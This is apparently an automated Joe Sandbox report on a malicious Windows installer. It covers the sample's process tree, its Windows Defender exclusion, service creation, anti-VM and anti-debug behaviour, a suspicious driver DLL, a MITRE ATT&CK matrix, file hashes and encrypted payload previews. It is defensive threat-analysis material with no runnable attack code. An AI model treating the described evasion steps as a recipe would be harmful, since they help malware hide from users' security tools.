Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009FAB2A GetSystemTimeAsFileTime,10_2_009FAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A90090 GetVersion,10_2_00A90090
MITRE ATT&CK matrix (number in parentheses = count of matched signatures for that technique; cells without a number were not observed in this analysis):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | Windows Service (1) | Access Token Manipulation (1) | Masquerading (11) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Service Execution (1) | DLL Side-Loading (1) | Windows Service (1) | Disable or Modify Tools (1) | LSASS Memory | Security Software Discovery (321) | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Native API (1) | Logon Script (Windows) | Process Injection (111) | Virtualization/Sandbox Evasion (231) | Security Account Manager | Virtualization/Sandbox Evasion (231) | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | DLL Side-Loading (1) | Access Token Manipulation (1) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Process Injection (111) | LSA Secrets | Application Window Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Deobfuscate/Decode Files or Information (1) | Cached Domain Credentials | System Owner/User Discovery (2) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information (3) | DCSync | File and Directory Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Software Packing (1) | Proc Filesystem | System Information Discovery (25) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | DLL Side-Loading (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (rendered as a figure in the original report; only the recoverable node and edge information is kept here)
Behavior Graph ID: 1579605 | Sample: #U5b89#U88c5#U52a9#U624b_1.... | Start date: 23/12/2024 | Architecture: WINDOWS | Score: 80
Top-level signatures: Found driver which could be used to inject code into processes; PE file contains section with special chars; AI detected suspicious sample; Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Process tree as drawn in the graph:
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe: drops C:\...\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PE32); starts #U5b89#U88c5#U52a9#U624b_1.0.9.tmp
  • cmd.exe (two instances plus 30 other processes): start sc.exe (five instances plus 26 other processes); each sc.exe starts conhost.exe
  • #U5b89#U88c5#U52a9#U624b_1.0.9.tmp: drops C:\Users\user\AppData\Local\...\update.vac (PE32) and C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); signature: Adds a directory exclusion to Windows Defender; starts #U5b89#U88c5#U52a9#U624b_1.0.9.exe and powershell.exe
  • powershell.exe: signature: Loading BitLocker PowerShell Module; starts conhost.exe and WmiPrvSE.exe
  • second #U5b89#U88c5#U52a9#U624b_1.0.9.exe: drops C:\...\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PE32); starts #U5b89#U88c5#U52a9#U624b_1.0.9.tmp
  • second #U5b89#U88c5#U52a9#U624b_1.0.9.tmp: drops C:\Users\user\AppData\Local\...\update.vac (PE32), C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+), C:\Program Files (x86)\...\trash (copy) (PE32+) and 3 other files (none is malicious); signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger; starts cmd.exe and two instances of 7zr.exe
  • cmd.exe: starts sc.exe and Conhost.exe; sc.exe starts conhost.exe
  • 7zr.exe: drops C:\Program Files (x86)\...\tProtect.dll (PE32+); each instance starts conhost.exe

Antivirus detection for the sample:

Source | Detection | Scanner
#U5b89#U88c5#U52a9#U624b_1.0.9.exe | 0% | ReversingLabs
#U5b89#U88c5#U52a9#U624b_1.0.9.exe | 6% | Virustotal

Antivirus detection for dropped files:

Source | Detection | Scanner
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\is-B21TE.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
URLs found in memory and binary strings (no antivirus detection was reported for any entry):

Name | Source | Malicious | Reputation
https://aria2.github.io/Usage: | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | false | unknown
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b_1.0.9.exe | false | high
https://github.com/aria2/aria2/issuesReport | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | false | high
http://www.metalinker.org/ | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | false | high
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1701537778.000000007F57B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1700871640.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000000.1703739788.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.1796069280.000000000032D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr | false | high
https://aria2.github.io/ | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | false | unknown
https://github.com/aria2/aria2/issues | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | false | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1701537778.000000007F57B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1700871640.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000000.1703739788.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.1796069280.000000000032D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.dr | false | high
http://www.metalinker.org/basic_string::_M_construct | #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | false | high
                    No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579605
Start date and time: 2024-12-23 05:16:31 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 110
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b_1.0.9.exe (renamed because the original name is a hash value)
Original Sample Name: _1.0.9.exe
Detection: MAL
Classification: mal80.evad.winEXE@146/32@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 76%
  • Number of executed functions: 66
  • Number of non-executed functions: 77
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
  • Exclude process from analysis (whitelisted): SIHClient.exe
  • Excluded IPs from analysis (whitelisted): 52.149.20.212
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed; the report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
                    No context
                    No context
                    No context
                    No context
Similar samples seen by Joe Sandbox (the SHA 256 column of the original table is only a link and is not reproduced here):

Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b_1.0.1.exe | malicious | Unknown
 | #U5b89#U88c5#U52a9#U624b_1.0.8.exe | malicious | Unknown
 | #U5b89#U88c5#U52a9#U624b_1.0.1.exe | malicious | Unknown
 | #U5b89#U88c5#U52a9#U624b_1.0.8.exe | malicious | Unknown
 | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | malicious | Unknown
 | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | malicious | Unknown
 | ekTL8jTI4D.msi | malicious | Unknown

Process: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious
  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious
  • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious
  • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious
  • Filename: ekTL8jTI4D.msi, Detection: malicious

Process: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type: data
Category: dropped
Size (bytes): 249984
Entropy (8bit): 7.999161200123711
Encrypted: true
SSDEEP: 6144:y/aC0aIi4VmN4i3LvqKPN23ksnaWL8Q9rye+Bm14B:yNb5fDNV23Ulm14B
MD5: 6B02F0DA3BB2B4FE892A9A462B66FF7C
SHA1: 5C9453562989CC675FBC88545BE306EF5CB09EF2
SHA-256: 58590B431FB3F05C915B9827DEFD9DD1E488F159D9712EC48C37A8A10BCDDF77
SHA-512: 3FFA99A1C554D14499934C40A9EC8F0646957E8C9F3D90B67E5581CEB7064B673C5654A84CE2193DA8BB5DECEE979F1152221B520A4E6E4FA9688A542A969ECC
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3598848
Entropy (8bit): 7.004949099807939
Encrypted: false
SSDEEP: 49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
MD5: 1D1464C73252978A58AC925ECE57F0FB
SHA1: 30E442BE965F96F3EB75A3ABDB61B90E5A506993
SHA-256: 05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
SHA-512: 40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type: data
Category: dropped
Size (bytes): 249984
Entropy (8bit): 7.999161200123711
Encrypted: true
SSDEEP: 6144:y/aC0aIi4VmN4i3LvqKPN23ksnaWL8Q9rye+Bm14B:yNb5fDNV23Ulm14B
MD5: 6B02F0DA3BB2B4FE892A9A462B66FF7C
SHA1: 5C9453562989CC675FBC88545BE306EF5CB09EF2
SHA-256: 58590B431FB3F05C915B9827DEFD9DD1E488F159D9712EC48C37A8A10BCDDF77
SHA-512: 3FFA99A1C554D14499934C40A9EC8F0646957E8C9F3D90B67E5581CEB7064B673C5654A84CE2193DA8BB5DECEE979F1152221B520A4E6E4FA9688A542A969ECC
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 5649408
Entropy (8bit): 6.392614480390128
Encrypted: false
SSDEEP: 98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
MD5: 8C71B86BF407C05BAF11E8D296B9C8B8
SHA1: 6624AB8CA883C48F02C58250D4EEE9E90098F4E4
SHA-256: BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
SHA-512: BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
Malicious: false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%

Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.997011252064675
Encrypted: true
SSDEEP: 1536:MsEZo4RLSOELwdAAOTXo+Pqyq5P5J74UmnNap/FOtP08J:8y4RLddAAOTXoKqZZQn1
MD5: DB0ACE7AA74DAA24BB781119C3C869AE
SHA1: 07A3730409AFB5070EC735425E77B492B6EBA129
SHA-256: 3FF34DB386F861828A302E5A4AD3E57409CAA8D4CCF5C867F80C2C8B514AF30D
SHA-512: 8FDBB6D6D195AB1EE949DBD855D4E6B1E58EEFF7191D667E9A8737C27A2ED0326AF905496CC61156FE48B2443FA1846DE668C5630F200E3408981B3AB439395C
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
File Type: 7-zip archive data, version 0.4
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.99701125206467
Encrypted: true
SSDEEP: 1536:DzeJcAKCT4h5YjqiOU+HyhjI3GKG0pY0e7zjuX+u:Dz4DtTfd/yvY0e7uJ
MD5: 09A8667EA9E45CA2FDD69DB8D762B163
SHA1: 0FADBFC5D02C59B7DB8C9CA9EB437FA7A6AE80FA
SHA-256: DACDD802F11565D9F8321D7884C8E865E6868EF1647794BFF17B063AB9234992
SHA-512: 21A78AE277171BE6E3E6155F2753DA1E58C96AFD068BEE36884C91DF2BE831E225BC1652CCF56400311E6266749CEA1328B9BF4811C7A736BBE237C3E5D5DBDE
Malicious: false
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):56546
                                  Entropy (8bit):7.996966859255975
                                  Encrypted:true
                                  SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                  MD5:CEA69F993E1CE0FB945A98BF37A66546
                                  SHA1:7114365265F041DA904574D1F5876544506F89BA
                                  SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                  SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                  Malicious:false
                                  Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:7-zip archive data, version 0.4
                                  Category:dropped
                                  Size (bytes):56546
                                  Entropy (8bit):7.996966859255979
                                  Encrypted:true
                                  SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                  MD5:4CB8B7E557C80FC7B014133AB834A042
                                  SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                  SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                  SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                  Malicious:false
                                  Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):31890
                                  Entropy (8bit):7.99402458740637
                                  Encrypted:true
                                  SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                  MD5:8622FC7228777F64A47BD6C61478ADD9
                                  SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                  SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                  SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                  Malicious:false
                                  Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:7-zip archive data, version 0.4
                                  Category:dropped
                                  Size (bytes):31890
                                  Entropy (8bit):7.99402458740637
                                  Encrypted:true
                                  SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                  MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                  SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                  SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                  SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                  Malicious:false
                                  Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):74960
                                  Entropy (8bit):7.99759370165655
                                  Encrypted:true
                                  SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                  MD5:950338D50B95A25F494EE74E97B7B7A9
